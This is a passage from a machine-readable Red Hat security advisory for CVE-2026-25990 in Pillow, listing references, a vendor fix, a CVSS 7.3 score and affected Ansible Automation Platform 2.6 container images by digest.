"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-01T18:20:27+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6404"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
